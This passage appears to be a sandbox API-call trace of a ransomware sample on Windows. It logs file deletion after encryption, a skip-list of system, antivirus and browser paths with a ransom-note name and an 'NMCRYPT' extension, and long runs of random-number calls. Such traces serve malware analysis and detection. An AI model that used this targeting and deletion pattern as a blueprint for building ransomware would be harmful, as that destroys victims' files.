lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0147.583] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml")) returned 0x20 [0147.584] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml", dwFileAttributes=0x20) returned 0 [0147.584] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml") returned 1 [0147.584] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml")) returned 0 [0147.584] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" [0147.584] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0147.584] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB35E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb35e.tmp")) returned 0xb35e [0147.585] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB35E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb35e.tmp"), dwFlags=0x1) returned 0 [0147.585] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXB35E.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxb35e.tmp")) returned 1 [0147.585] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0147.585] wcslen (_String="OK") returned 0x2 [0147.585] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.585] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0147.585] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0147.585] CryptDestroyHash (hHash=0x9ad4b8) returned 1 [0147.585] CryptReleaseContext (hProv=0x8e3660, dwFlags=0x0) returned 1 [0147.585] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*NMCRYPT") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*Recovers your files.html") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*.exe") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*.dll") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*.lnk") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*.bat") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*.ini") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*.msi") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*.scf") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*pagefile.sys*") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*NTUSER.DAT*") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*AppData*") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*\\winrar\\*") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*\\java\\*") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*\\windows\\*") returned 0 [0147.585] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*\\ESET\\*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*\\AVG\\*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*\\AVIRA\\*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*Atheros*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*Realtek*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*bootmgr*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*boot*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*boot*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*CONFIG.SYS*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*IO.SYS*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*MSDOS.SYS*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*NTDETECT.COM*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*ntldr*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*chrome*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*opera*") returned 0 [0147.586] PathMatchSpecW (pszFile="ipsid.xml", pszSpec="*firefox*") returned 0 [0147.586] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml", pszSpec="*") returned 1 [0147.586] strlen (_Str="NMoreira") returned 0x8 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.586] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.587] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.588] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0147.589] CryptGenRandom 